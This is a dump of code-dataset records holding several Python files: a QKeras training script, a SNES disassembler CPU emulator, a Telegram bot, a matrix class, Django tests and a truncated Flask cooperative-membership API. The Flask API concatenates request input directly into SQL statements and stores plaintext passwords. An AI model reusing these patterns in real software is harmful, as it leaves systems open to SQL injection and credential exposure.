print(x_train_.shape[0], \"train samples\")\n print(x_test_.shape[0], \"test samples\")\n\n y_train_ = to_categorical(y_train_, NB_CLASSES)\n y_test_ = to_categorical(y_test_, NB_CLASSES)\n\n if not load_weights:\n model.fit(\n x_train_,\n y_train_,\n batch_size=batch_size,\n epochs=NB_EPOCH,\n verbose=VERBOSE,\n validation_split=VALIDATION_SPLIT)\n\n if weights_f:\n model.save_weights(weights_f)\n\n score = model.evaluate(x_test_, y_test_, verbose=False)\n print(\"Test score:\", score[0])\n print(\"Test accuracy:\", score[1])\n\n return model, x_train_\n\n\nif __name__ == \"__main__\":\n args = ParserArgs()\n model, x_train = UseNetwork(args.weight_file, load_weights=args.load_weight)\n\n if args.logic_optimize:\n i_dict = get_quantized_bits_dict(2,0,0,mode=\"bin\" if args.use_pla else \"dec\")\n o_dict = get_quantized_bits_dict(2,0,0,mode=\"bin\" if args.use_pla else \"dec\")\n\n print(\"... generating table with {} entries\".format(x_train.shape[0]))\n\n files = optimize_dense_logic(\n model, args.i_name, args.o_name, x_train,\n i_dict, o_dict, output_group=args.output_group,\n samples=int(args.sample) if args.sample else x_train.shape[0],\n generate_pla=args.use_pla)\n\n if args.use_pla and args.run_abc:\n run_optimizer(args.i_name, files)\n\n","sub_path":"qkeras/experimental/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"438387798","text":"from copy import copy\nfrom typing import List, Optional, Tuple\n\nfrom gilgamesh.snes.instruction import (\n Instruction,\n InstructionID,\n RetIndirectType,\n StackManipulation,\n)\nfrom gilgamesh.snes.opcodes import AddressMode, Op\nfrom gilgamesh.snes.registers import Registers\nfrom gilgamesh.snes.state import State, StateChange, UnknownReason\nfrom gilgamesh.stack import Stack, StackEntry\nfrom gilgamesh.subroutine import Subroutine\n\n\nclass CPU:\n def __init__(self, log, pc: int, p: int, subroutine: int):\n self.log = log\n self.rom = log.rom\n\n # Processor state.\n self.pc = pc\n self.state = State(p)\n self.registers = Registers(self.state)\n self.stack = Stack()\n\n # Change in CPU state caused by the execution of the current subroutine.\n self.state_change = StateChange()\n # What we know about the CPU state based on the\n # sequence of instructions we have executed.\n self.state_inference = StateChange()\n\n # The subroutine currently being executed.\n self.subroutine_pc = subroutine\n # The stack of calls that brought us to the current subroutine.\n self.stack_trace: List[int] = []\n\n @property\n def instruction_id(self) -> InstructionID:\n # Get the ID of the instruction currently being executed\n # in the context of the current subroutine.\n return InstructionID(self.pc, self.state.p, self.subroutine_pc)\n\n @property\n def subroutine(self) -> Subroutine:\n return self.log.subroutines[self.subroutine_pc]\n\n def copy(self, new_subroutine=False) -> \"CPU\":\n # Copy the current state of the CPU.\n cpu = copy(self)\n cpu.state = copy(self.state)\n cpu.registers = self.registers.copy(cpu.state)\n cpu.stack = self.stack.copy() # TODO: check if necessary.\n cpu.stack_trace = copy(self.stack_trace)\n cpu.state_inference = copy(self.state_inference)\n # Don't carry over the state change information to new subroutines.\n cpu.state_change = StateChange() if new_subroutine else copy(self.state_change)\n return cpu\n\n def run(self) -> None:\n keep_going = self.step()\n while keep_going:\n keep_going = self.step()\n\n def step(self) -> bool:\n # We can't analyze code that lives in RAM.\n if self.rom.is_ram(self.pc):\n return False\n # Don't visit the exact same instruction twice.\n if self.log.is_visited(self.instruction_id):\n return False\n\n # Disassemble and log the instruction.\n opcode = self.rom.read_byte(self.pc)\n argument = self.rom.read_address(self.pc + 1)\n instruction = Instruction(\n self.log,\n *self.instruction_id,\n opcode,\n argument,\n self.registers.snapshot(),\n copy(self.state_change)\n )\n self.log.add_instruction(instruction)\n\n # Emulate the instruction.\n keep_going = self.execute(instruction)\n # Apply asserted state changes if any, and log it inside the instruction object.\n instruction.state_change_after = self._maybe_apply_asserted_state_change(\n instruction\n )\n\n return keep_going\n\n def execute(self, instruction: Instruction) -> bool:\n self.pc += instruction.size\n\n # See if we can learn something about the *required*\n # state of the CPU based on the current instruction.\n self._derive_state_inference(instruction)\n\n if instruction.is_return:\n return self.ret(instruction)\n elif instruction.is_interrupt:\n self._unknown_subroutine_state(\n instruction, unknown_reason=UnknownReason.SUSPECT_INSTRUCTION\n )\n return False\n elif instruction.is_jump:\n self.jump(instruction)\n return False\n elif instruction.is_call:\n return self.call(instruction)\n elif instruction.is_branch:\n self.branch(instruction)\n elif instruction.is_sep_rep:\n self.sep_rep(instruction)\n elif instruction.does_change_stack:\n self.change_stack(instruction)\n elif instruction.does_change_a:\n self.change_a(instruction)\n elif instruction.is_pop:\n return self.pop(instruction)\n elif instruction.is_push:\n self.push(instruction)\n\n return True # Keep executing in the context of this subroutine.\n\n def branch(self, instruction: Instruction) -> None:\n # Run a parallel instance of the CPU to follow\n # the case in which we don't take the branch.\n cpu = self.copy()\n cpu.run()\n\n target = instruction.absolute_argument\n assert target is not None\n\n # Log the fact that the current instruction references the\n # instruction pointed by the branch. Then take the branch.\n self.log.add_reference(instruction, target)\n self.pc = target\n\n def _calculate_targets(self, i: Instruction, targets):\n if not targets:\n if i.absolute_argument:\n return [(None, i.absolute_argument)]\n else:\n return self.log.jump_assertions.get(i.pc, None) or [(None, None)]\n else:\n return targets or [(None, None)]\n\n def call(self, i: Instruction, targets=None) -> bool:\n # Keep track of the state before the call.\n targets = self._calculate_targets(i, targets)\n saved_state, saved_state_change = copy(self.state), copy(self.state_change)\n possible_states = set()\n\n for _, target in targets:\n if target is None or self.rom.is_ram(target):\n # If we can't reliably derive the address of the subroutine\n # being called, we're left in an unknown state.\n return self._unknown_subroutine_state(\n i, unknown_reason=UnknownReason.INDIRECT_JUMP\n )\n\n # Run a parallel instance of the CPU to execute\n # the subroutine that is being called.\n cpu = self.copy(new_subroutine=True)\n call_size = 2 if i.operation in (Op.JSR, Op.RTS) else 3\n cpu.stack.push(i, i.pc, call_size)\n cpu.stack_trace.append(self.subroutine_pc)\n cpu.subroutine_pc = target\n cpu.pc = target\n\n # Emulate the called subroutine.\n self.log.add_reference(i, target)\n self.log.add_subroutine(target, stack_trace=cpu.stack_trace)\n cpu.run()\n\n # If we univocally know what the return state of the\n # called subroutine is, we can propagate it to the\n # current CPU state. Otherwise, to be on the safe\n # side, we need to stop the execution.\n known, unknown_reason = self._propagate_subroutine_state(i.pc, target)\n if known or self._unknown_subroutine_state(\n i, unknown_reason=unknown_reason\n ):\n possible_states.add((self.state, self.state_change))\n\n # Restore the state before this target was executed.\n self.state, self.saved_state_change = (\n copy(saved_state),\n copy(saved_state_change),\n )\n\n if i.has_asserted_state_change:\n return True\n\n for state, state_change in possible_states:\n cpu = self.copy()\n cpu.state, cpu.state_change = state, state_change\n cpu.run()\n return False\n\n def jump(self, i: Instruction, targets=None) -> None:\n targets = self._calculate_targets(i, targets)\n for _, target in targets:\n if target is None:\n self._unknown_subroutine_state(\n i, unknown_reason=UnknownReason.INDIRECT_JUMP\n )\n return\n\n self.log.add_reference(i, target)\n cpu = self.copy()\n cpu.pc = target\n cpu.run()\n\n def ret(self, i: Instruction) -> bool:\n def standard_return():\n self.log.add_subroutine_state(self.subroutine.pc, i.pc, self.state_change)\n return False\n\n if i.operation == Op.RTI:\n return standard_return()\n\n ret_size = 2 if i.operation == Op.RTS else 3\n stack_entries = self.stack.pop(ret_size)\n\n # Check for stack manipulations.\n stack_manipulator = self._check_stack_manipulation(i, stack_entries)\n if not stack_manipulator:\n return standard_return()\n\n # If the stack is constructed in such a way that\n # we would return to the next instruction, it is\n # effectively a subroutine call.\n if self.stack.match(i.pc, ret_size):\n i.ret_indirect_type = RetIndirectType.CALL\n self.log.assert_jump(i.pc, set_dirty=False)\n for s in self.stack.pop(ret_size):\n if s.instruction:\n s.instruction.stack_manipulation = StackManipulation.HARMLESS\n return self.call(i, self.log.jump_assertions[i.pc])\n\n # Otherwise, if we know this is a jump table, then it's a simple jump.\n elif i.is_jump_table:\n i.ret_indirect_type = RetIndirectType.JUMP\n for s in stack_entries:\n if s.instruction:\n s.instruction.stack_manipulation = StackManipulation.HARMLESS\n self.jump(i, self.log.jump_assertions[i.pc])\n return False\n\n # We don't know for certain that this is a jump table, signal\n # an unknown state.\n else:\n self._unknown_subroutine_state(\n i,\n unknown_reason=UnknownReason.STACK_MANIPULATION,\n stack_manipulator=stack_manipulator,\n )\n return False\n\n @staticmethod\n def _check_stack_manipulation(\n i: Instruction, stack_entries: List[StackEntry]\n ) -> Optional[Instruction]:\n # Check whether this return is operating on a manipulated stack.\n call_op = (Op.JSR, Op.RTS) if i.operation == Op.RTS else (Op.JSL, Op.RTL)\n # Non-call instructions which operated on the region of the\n # stack containing the return address from the subroutine.\n stack_manipulators = [\n s.instruction\n for s in stack_entries\n if not s.instruction or s.instruction.operation not in call_op\n ]\n if stack_manipulators:\n return stack_manipulators[-1]\n return None\n\n def sep_rep(self, instruction: Instruction) -> None:\n arg = instruction.absolute_argument\n assert arg is not None\n\n if instruction.operation == Op.SEP:\n self.state.set(arg)\n self.state_change.set(arg)\n else:\n self.state.reset(arg)\n self.state_change.reset(arg)\n\n # Simplify the state change by applying our knowledge\n # of the current state. I.e. if we know that the\n # processor is operating in 8-bits accumulator mode\n # and we switch to that same mode, effectively no\n # state change is being performed.\n self.state_change.apply_inference(self.state_inference)\n\n def change_a(self, i: Instruction) -> None:\n if i.address_mode == AddressMode.IMMEDIATE_M:\n assert i.argument is not None\n a = self.registers.a.get()\n\n if i.operation == Op.LDA:\n self.registers.a.set(i.argument)\n elif a is not None:\n if i.operation == Op.ADC:\n # TODO: handle carry flag.\n self.registers.a.set(a + i.argument)\n elif i.operation == Op.SBC:\n # TODO: handle negative flag.\n self.registers.a.set(a - i.argument)\n elif i.operation == Op.TSC:\n self.registers.a.set_whole(self.stack.pointer)\n elif i.operation == Op.PLA:\n self.stack.pop(self.state.a_size)\n else:\n self.registers.a.set(None)\n\n def change_stack(self, i: Instruction) -> None:\n if i.operation == Op.TCS:\n a = self.registers.a.get_whole()\n self.stack.set_pointer(i, a)\n if a is not None:\n return\n # We keep the disassembly going if the stack manipulation\n # doesn't otherwise influence the state of the processor.\n i.stack_manipulation = StackManipulation.HARMLESS\n\n def push(self, instruction: Instruction) -> None:\n if instruction.operation == Op.PHP:\n self.stack.push(instruction, (copy(self.state), copy(self.state_change)))\n elif instruction.operation == Op.PHA:\n self.stack.push(instruction, self.registers.a.get(), self.state.a_size)\n elif instruction.operation in (Op.PHX, Op.PHY):\n self.stack.push(instruction, size=self.state.x_size)\n elif instruction.operation in (Op.PHB, Op.PHK):\n self.stack.push(instruction)\n elif instruction.operation in (Op.PHD, Op.PEA, Op.PER):\n self.stack.push(instruction, size=2)\n else:\n assert False\n\n def pop(self, i: Instruction) -> bool:\n if i.operation == Op.PLP:\n entry = self.stack.pop_one()\n if entry.instruction and entry.instruction.operation == Op.PHP:\n self.state, self.state_change = entry.data\n # We can't trust the disassembly if we don't know\n # which state the PLP instruction is restoring.\n else:\n return self._unknown_subroutine_state(\n i,\n unknown_reason=UnknownReason.STACK_MANIPULATION,\n stack_manipulator=entry.instruction,\n )\n\n elif i.operation in (Op.PLX, Op.PLY):\n self.stack.pop(self.state.x_size)\n elif i.operation == Op.PLB:\n self.stack.pop_one()\n elif i.operation == Op.PLD:\n self.stack.pop(2)\n else:\n assert False\n return True\n\n def _derive_state_inference(self, instruction: Instruction) -> None:\n # If we're executing an instruction with a certain operand size,\n # and no state change has been performed in the current subroutine,\n # then we can infer that the state of the processor as we enter\n # the subroutine *must* be the same in all cases.\n if (\n instruction.address_mode == AddressMode.IMMEDIATE_M\n and self.state_change.m is None\n ):\n self.state_inference.m = self.state.m\n elif (\n instruction.address_mode == AddressMode.IMMEDIATE_X\n and self.state_change.x is None\n ):\n self.state_inference.x = self.state.x\n\n def _propagate_subroutine_state(\n self, call_pc: int, subroutine_pc: int\n ) -> Tuple[bool, UnknownReason]:\n known = True\n unknown_reason = UnknownReason.KNOWN\n\n # If the user defined a state assertion for the current instruction.\n if call_pc in self.log.instruction_assertions:\n return (known, unknown_reason) # Execution can proceed.\n\n # If the subroutine can return in more than one distinct state, or its\n # state is unknown, we can't reliably propagate the state to the caller.\n subroutine = self.log.subroutines[subroutine_pc]\n return_states = subroutine.simplify_return_states(self.state)\n\n # Multiple known return states.\n if len([s for s in return_states if not s.unknown]) > 1:\n known = False\n unknown_reason = UnknownReason.MULTIPLE_RETURN_STATES\n self.log.add_subroutine_state(\n self.subroutine_pc, call_pc, StateChange(unknown_reason=unknown_reason)\n )\n # Unknown state with some reason.\n elif any(s.unknown for s in return_states):\n known = False\n unknown_state = [s for s in return_states if s.unknown][0]\n unknown_reason = unknown_state.unknown_reason\n self.log.add_subroutine_state(self.subroutine_pc, call_pc, unknown_state)\n\n # Unique return state, apply it.\n if known:\n assert len(return_states) == 1\n self._apply_state_change(return_states.pop())\n\n return (known, unknown_reason)\n\n def _unknown_subroutine_state(\n self,\n instruction: Instruction,\n unknown_reason: Optional[UnknownReason] = None,\n stack_manipulator: Optional[Instruction] = None,\n ) -> bool:\n # Check if the user defined a state assertion for the current instruction.\n if instruction.pc in self.log.instruction_assertions:\n return True # Execution can proceed.\n\n # No custom assertion, we need to stop here.\n unknown_reason = unknown_reason or UnknownReason.UNKNOWN\n self.state_change = StateChange(unknown_reason=unknown_reason)\n self.log.add_subroutine_state(\n self.subroutine_pc, instruction.pc, copy(self.state_change)\n )\n\n # If the unknown state is due to stack manipulation:\n if unknown_reason == UnknownReason.STACK_MANIPULATION:\n # If we know which instruction performed the\n # manipulation, we flag it.\n if stack_manipulator:\n self.subroutine.has_stack_manipulation = True\n stack_manipulator.stack_manipulation = (\n StackManipulation.CAUSES_UNKNOWN_STATE\n )\n\n return False\n\n def _apply_state_change(self, state_change: StateChange) -> None:\n if state_change.m is not None:\n self.state_change.m = self.state.m = state_change.m\n if state_change.x is not None:\n self.state_change.x = self.state.x = state_change.x\n\n def _maybe_apply_asserted_state_change(self, i: Instruction) -> StateChange:\n \"\"\"Apply asserted state changes if any. Return the asserted\n state change if there is one, or a copy of the current state\n change otherwise.\"\"\"\n asserted_state = self.log.instruction_assertions.get(i.pc)\n if asserted_state:\n self._apply_state_change(asserted_state)\n return asserted_state\n else:\n return copy(self.state_change)\n","sub_path":"gilgamesh/snes/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":18291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"580815195","text":"import telegram\r\nimport datetime\r\nimport time\r\nimport sqlite3\r\nfrom telegram.ext import Updater\r\nfrom telegram.ext import CommandHandler\r\nfrom telegram.ext import MessageHandler, Filters, ConversationHandler, RegexHandler\r\nfrom functools import wraps\r\nfrom telegram import ChatAction, InlineKeyboardButton, ForceReply, KeyboardButton\r\nimport logging\r\nimport os\r\nimport psycopg2\r\n\r\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nLENGTH, WIDTH, HEIGHT = range(3)\r\n\r\nlength = 0\r\nwidth = 0\r\nheight = 0\r\n\r\ndef send_action(action):\r\n def decorator(func):\r\n @wraps(func)\r\n def command_func(*args, **kwargs):\r\n bot, update = args\r\n bot.send_chat_action(chat_id=update.effective_message.chat_id, action=action)\r\n return func(bot, update, **kwargs)\r\n return command_func\r\n \r\n return decorator\r\n\r\ndef cancel(bot, update):\r\n return ConversationHandler.END\r\n\r\ndef error(bot, update, error):\r\n logger.warning('Update \"%s\" caused error \"%s\"', update, error)\r\n\r\n#Code for LENGTH\r\n\r\ndef start(bot, update):\r\n bot.send_chat_action(chat_id=update.message.chat_id , action = telegram.ChatAction.TYPING)\r\n time.sleep(1)\r\n bot.send_message(chat_id=update.message.chat_id, text='Напишите *длину* индивидуальной упаковки', parse_mode=telegram.ParseMode.MARKDOWN)\r\n return LENGTH\r\n\r\ndef save_length(bot, update):\r\n length = update.message.text\r\n print(length)\r\n ask_width(bot, update)\r\n\r\n#Code for WIDTH\r\n\r\ndef ask_width(bot, update):\r\n bot.send_chat_action(chat_id=update.message.chat_id , action = telegram.ChatAction.TYPING)\r\n time.sleep(1)\r\n bot.send_message(chat_id=update.message.chat_id, text='Напишите *ширину* индивидуальной упаковки', parse_mode=telegram.ParseMode.MARKDOWN)\r\n return WIDTH\r\n\r\ndef save_width(bot, update):\r\n width = update.message.text\r\n print(width)\r\n ask_height(bot, update)\r\n\r\n#Code for HEIGHT\r\n\r\ndef ask_height(bot, update):\r\n bot.send_chat_action(chat_id=update.message.chat_id , action = telegram.ChatAction.TYPING)\r\n time.sleep(1)\r\n bot.send_message(chat_id=update.message.chat_id, text='Напишите *высоту* индивидуальной упаковки', parse_mode=telegram.ParseMode.MARKDOWN)\r\n return HEIGHT\r\n\r\ndef save_height(bot, update):\r\n height = update.message.text\r\n print(height)\r\n\r\ndef main():\r\n updater = Updater(token=\"TOKEN\")\r\n dispatcher = updater.dispatcher\r\n\r\n conv_handler = ConversationHandler(\r\n entry_points = [CommandHandler('start', start)],\r\n\r\n states = {\r\n LENGTH: [MessageHandler(Filters.text, save_length, pass_user_data=False)],\r\n WIDTH: [MessageHandler(Filters.text, save_width, pass_user_data=False)],\r\n HEIGHT: [MessageHandler(Filters.text, save_height, pass_user_data=False)]\r\n },\r\n\r\n fallbacks=[CommandHandler('cancel', cancel)]\r\n )\r\n\r\n dispatcher.add_handler(conv_handler)\r\n\r\n dispatcher.add_error_handler(error)\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"535061907","text":"from random import uniform\r\n\r\n\r\nclass Matrix:\r\n def __init__(self, rows, cols):\r\n self.rows = rows\r\n self.cols = cols\r\n self.shape = (rows, cols)\r\n self.data = []\r\n for i in range(self.rows):\r\n self.data.append([])\r\n for j in range(self.cols):\r\n self.data[i].append(0)\r\n\r\n @staticmethod\r\n def from_array(array):\r\n # turns a 1 dimensional array into a 1 dimensional Matrix\r\n array_length = len(array)\r\n result = Matrix(array_length, 1)\r\n for i in range(array_length):\r\n result.data[i][0] = array[i]\r\n return result\r\n\r\n @staticmethod\r\n def from_array_2d(array):\r\n # turns a 2 dimensional array into a 2 dimensional Matrix\r\n array_rows = len(array)\r\n array_cols = len(array[0])\r\n result = Matrix(array_rows, array_cols)\r\n for i in range(array_rows):\r\n for j in range(array_cols):\r\n result.data[i][j] = array[i][j]\r\n return result\r\n\r\n def to_array(self):\r\n # turns a Matrix into an Array\r\n result = []\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n result.append(self.data[i][j])\r\n return result\r\n\r\n @staticmethod\r\n def subtract(a, b):\r\n\r\n # Subtracts each element of B form each element of A\r\n # A and B both should be matrices\r\n # also the shape of A and the shape of B should be equal\r\n\r\n if isinstance(a, Matrix) and isinstance(b, Matrix):\r\n if a.shape == b.shape:\r\n result = Matrix(a.rows, a.cols)\r\n for i in range(a.rows):\r\n for j in range(a.cols):\r\n result.data[i][j] = a.data[i][j] - b.data[i][j]\r\n return result\r\n else:\r\n print(\"!!! Inputs should be instances of Matrix\")\r\n return None\r\n\r\n def multiply(self, n):\r\n\r\n # If N is a Matrix it will multiply each element of your matrix by corresponding element in N\r\n # Note: the shape of N and the shape of your matrix should be the same\r\n\r\n if isinstance(n, Matrix):\r\n if self.shape == n.shape:\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] *= n.data[i][j]\r\n\r\n # If N is a number then your matrix will be multiplied by N\r\n else:\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] *= n\r\n\r\n @staticmethod\r\n def product(a, b):\r\n # Returns the dot product of two matrices\r\n # A and B both should be matrices\r\n # Th number of columns of A should be same as the number B rows\r\n\r\n if isinstance(a, Matrix) and isinstance(b, Matrix):\r\n if a.cols == b.rows:\r\n result = Matrix(a.rows, b.cols)\r\n for i in range(result.rows):\r\n for j in range(result.cols):\r\n temp_sum = 0\r\n for k in range(a.cols):\r\n temp_sum += a.data[i][k] * b.data[k][j]\r\n result.data[i][j] = temp_sum\r\n return result\r\n else:\r\n print(\"!!! Columns of first matrix must match row of the second matrix\")\r\n return None\r\n\r\n def add(self, n):\r\n # If N is a Matrix it adds each element of your matrix by corresponding element in N\r\n # Note: the shape of N and the shape of your matrix should be the same\r\n if isinstance(n, Matrix):\r\n if self.shape == n.shape:\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] += n.data[i][j]\r\n # If N is a number then it adds N to each element of your matrix\r\n else:\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] += n\r\n\r\n def map_function(self, func):\r\n # applies given function to each element of your matrix\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n val = self.data[i][j]\r\n self.data[i][j] = func(val)\r\n\r\n @staticmethod\r\n def map_function_static(mat, func):\r\n # applies given function to each element of the given matrix\r\n result = Matrix(mat.rows, mat.cols)\r\n for i in range(result.rows):\r\n for j in range(result.cols):\r\n val = mat.data[i][j]\r\n result.data[i][j] = func(val)\r\n return result\r\n\r\n @staticmethod\r\n def transpose(mat):\r\n # transposes the given matrix\r\n # in other words it Reverses the axes of the given matrix\r\n result = Matrix(mat.cols, mat.rows)\r\n for i in range(mat.rows):\r\n for j in range(mat.cols):\r\n result.data[j][i] = mat.data[i][j]\r\n return result\r\n\r\n def randomize(self):\r\n # initializes you matrix with random numbers between -1 and 1\r\n for i in range(self.rows):\r\n for j in range(self.cols):\r\n self.data[i][j] = uniform(-1, 1)\r\n","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"159088738","text":"#!/usr/bin/env python3\nimport subprocess\nfrom argparse import ArgumentParser, FileType\n\n\ndef requirements():\n parser = ArgumentParser()\n parser.add_argument(\n \"--requirements-file\",\n type=FileType(\"w\"),\n default=\"requirements.txt\",\n )\n # fetch list of changed files passed by pre-commit\n parser.add_argument(\"changed_pipfiles\", nargs=\"+\")\n args, extra_args = parser.parse_known_args()\n subprocess.run([\"pipenv\", \"requirements\", *extra_args], stdout=args.requirements_file)\n\n\ndef verify():\n subprocess.run([\"pipenv\", \"verify\"])\n","sub_path":"pipenv_lock_pre_commit.py","file_name":"pipenv_lock_pre_commit.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"232876319","text":"\"\"\"\nThis file demonstrates writing tests using the unittest module. These will pass\nwhen you run \"manage.py test\".\n\nReplace this with more appropriate tests for your application.\n\"\"\"\n\nfrom django.test import TestCase\nfrom contacts.models import Contact\n\nclass SimpleTest(TestCase):\n def test_basic_addition(self):\n \"\"\"\n Tests that 1 + 1 always equals 2.\n \"\"\"\n self.assertEqual(1 + 1, 2)\n\nclass ContactTests(TestCase):\n def test_str(self):\n c = Contact(first_name='Joe', last_name='Doe')\n self.assertEqual(str(c), 'Joe Doe')\n\nfrom django.test.client import RequestFactory\nfrom contacts.views import ContactListView\n\nclass ContactListViewsTest(TestCase):\n\n def test_no_contacts_in_context(self):\n factory = RequestFactory()\n request = factory.get('/')\n\n response = ContactListView.as_view()(request)\n self.assertEqual(\n list(response.context_data['object_list']),\n [],\n )\n\n def test_contact_in_context(self):\n factory = RequestFactory()\n request = factory.get('/')\n\n c = Contact.objects.create(first_name='Some', last_name='More', email='artem@gmail.com')\n response = ContactListView.as_view()(request)\n self.assertEqual(\n list(response.context_data['object_list']),\n [c],\n )\n\n def test_contacts_in_context(self):\n factory = RequestFactory()\n request = factory.get('/')\n\n c = Contact.objects.create(first_name='Some', last_name='More', email='artem@gmail.com')\n d = Contact.objects.create(first_name='New', last_name='One', email='arty@gmail.com')\n response = ContactListView.as_view()(request)\n self.assertEqual(\n list(response.context_data['object_list']),\n [c, d],\n )\n\nfrom django.test import LiveServerTestCase\nfrom selenium.webdriver.firefox.webdriver import WebDriver\n\nclass CreateContactIntegrationTest(LiveServerTestCase):\n @classmethod\n def setUpClass(cls):\n cls.selenium = WebDriver()\n super(CreateContactIntegrationTest, cls).setUpClass()\n\n @classmethod\n def tearDownClass(cls):\n cls.selenium.quit()\n super(CreateContactIntegrationTest, cls).tearDownClass()\n\n def test_add_contact(self):\n\n self.selenium.get('%s/new' % (self.live_server_url, ))\n self.selenium.find_element_by_id('id_first_name').send_keys(\"Joey\")\n self.selenium.find_element_by_id('id_last_name').send_keys(\"Smith\")\n self.selenium.find_element_by_id('id_email').send_keys(\"joey@joeysmith.com\")\n self.selenium.find_element_by_xpath(\"//input[@type='submit']\").click()\n\n self.assertEqual(Contact.objects.all()[0].first_name, 'Joey')\n","sub_path":"contacts/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"249997350","text":"import datetime\nimport hashlib\n\nfrom flask import Flask, request, abort, json\nfrom flask_cors import CORS\nimport connection\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\napp = Flask(__name__)\nCORS(app)\napi_version = \"API_KOPERASI Ver 2017.9 By Eng | (c) Copyrights Enggar 2017\"\nnow = datetime.datetime.now()\n\n# PETUGAS DAN ANGGOTA\n@app.route('/register_petugas_get_id', methods=[\"GET\",])\ndef register_petugas_get_id():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT id+1 FROM `tb_ms_login` ORDER BY id DESC limit 1;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n res_data['response'] = 'OK'\n res_data['msg'] = \"PG\"+str(jumlah_row)\n db.close()\n return json.dumps(res_data)\n\n\n@app.route('/register_petugas', methods=[\"POST\",\"GET\"])\ndef register():\n try:\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n username = data['username']\n password = data['password']\n fullname = data['fullname']\n email = data['email']\n address = data['address']\n jenis_role = data['jenis_role']\n registered_by = data['registered_by']\n id_petugas = data['id_petugas']\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\"SELECT count(id) as jumlah FROM `tb_ms_login` where username = '\"+username+\"' or email = '\"+email+\"';\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n jumlah_row = rs[0][0]\n if jumlah_row > 0 :\n res_data['response'] = 'NOK'\n res_data['msg'] = 'User Already Registered'\n return json.dumps(res_data)\n\n q_insert = (\"INSERT INTO `tb_ms_login` (username, password, fullname, email, address, jenis_role, registered_by, id_petugas) values ('\"+username+\"','\"+password+\"','\"+fullname+\"','\"+email+\"','\"+address+\"','\"+jenis_role+\"','\"+registered_by+\"','\"+id_petugas+\"');\")\n curr.execute(q_insert)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'User Registered'\n return json.dumps(res_data)\n\n except Exception as e:\n res_data = {}\n app.logger.error('An error occured.')\n app.logger.error(e)\n res_data['ACK'] = 'NOK'\n res_data['msg'] = str(e)\n return json.dumps(res_data)\n\n\n@app.route('/inquiry_petugas', methods=[\"GET\",])\ndef inquiry_petugas():\n res_data = {}\n if request.method == 'GET':\n db = connection.get_db()\n curr = db.cursor()\n q_is_exist = (\n \"SELECT id_petugas, fullname, email, address, username, jenis_role, registered_by FROM `tb_ms_login` WHERE flagactive = TRUE;\")\n curr.execute(q_is_exist)\n rs = curr.fetchall()\n res_data['response'] = 'OK'\n res_data['petugas'] = rs\n res_data['len_data'] = len(rs)\n db.close()\n return json.dumps(res_data)\n\n@app.route('/modify_petugas', methods=[\"POST\",\"GET\"])\ndef modify_petugas():\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_petugas = str(data['id_petugas'])\n nama_petugas = str(data['nama_petugas'])\n alamat_petugas = str(data['alamat_petugas'])\n email_petugas = str(data['email_petugas'])\n # edit_by = str(data['edit_by'])\n jenis_role = str(data['jenis_role'])\n\n db = connection.get_db()\n curr = db.cursor()\n q_modify = (\"UPDATE `db_koperasi`.`tb_ms_login` SET `fullname` = '\"+nama_petugas+\"', `address` = '\"+alamat_petugas+\"', `email` = '\"+email_petugas+\"', `jenis_role` = '\"+jenis_role+\"' WHERE `id_petugas` = '\"+id_petugas+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Data Petugas Berhasil diUpdate'\n return json.dumps(res_data)\n\n@app.route('/delete_petugas', methods=[\"POST\",\"GET\"])\ndef delete_petugas():\n res_data = {}\n print (request.json)\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n id_petugas = str(data['id_petugas'])\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n\n q_modify = (\"UPDATE `db_koperasi`.`tb_ms_login` set `flagactive` = FALSE WHERE `id_petugas` = '\"+id_petugas+\"';\")\n print (q_modify)\n curr.execute(q_modify)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Petugas Berhasil Dihapus dari sistem'\n return json.dumps(res_data)\n\n@app.route('/login', methods=[\"POST\",\"GET\"])\ndef login():\n try:\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n username = data['username']\n password = data['password']\n print (data)\n if (data['signature'] != 